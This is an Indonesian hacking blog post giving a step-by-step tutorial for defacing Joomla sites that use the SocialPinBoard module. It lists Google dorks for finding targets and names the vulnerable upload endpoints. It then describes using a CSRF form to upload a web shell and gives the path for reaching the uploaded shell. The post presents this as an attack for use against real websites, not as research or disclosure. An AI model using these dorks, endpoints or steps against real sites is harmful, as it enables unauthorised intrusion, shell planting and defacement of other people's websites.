Tutorial Deface Joomla SocialPinBoard - Tatsumi Crew

News

Post Top Ad

Wednesday, December 13, 2017

Tutorial Deface Joomla SocialPinBoard

Hai guyss, ogenki desukaaa? hhh gblg... ok kali ini saya mau membuat artikel Tutorial Deface Joomla SocialPinBoard sepertinya ini jarang digunakan oleh orang lain, mungkin karna gak ada tutorialnya, karna itu saya akan membuat tutorialnya sekarang... ok ga usah banyak bacot lagi, langsung saja

CSRF : 
PHP : HERE
HTML : HERE

Dork : 
inurl:/modules/mod_socialpinboard_menu/ 
index of /mod_socialpinboard_menu/ 
inurl:/index.php?option=com_socialpinboard

Exploit : 
www.target.com/modules/mod_socialpinboard_menu/saveimagefromupload.php
www.target.com/modules/mod_socialpinboard_menu/upload-file.php

Step by Step : 
1. Dorking di google

2. Silahkan dipilih target nya, setelah itu masukkan exploitnya

3. Kalau blank, itu berarti vuln.. bisa di gangbang / anal :'''v

4. Buka notepad > masukkan csrf > ganti link target nya > save test.html > buka test.html > upload shell kamu

5. Setelah kalian upload, nanti akan keluar angka random, dan itu adalah nama shell kalian

6. Dan berhasil di upload :D Akses shell nya
Akses Shell : 
www.target.com/modules/mod_socialpinboard_menu/images/socialpinboard/temp/[random].php

Author : Con7ext | Xai Syndicate
Sumber : LAUGHTATYOU BLOG
Sekian Terimakasih :D

No comments:

Post a Comment

Post Top Ad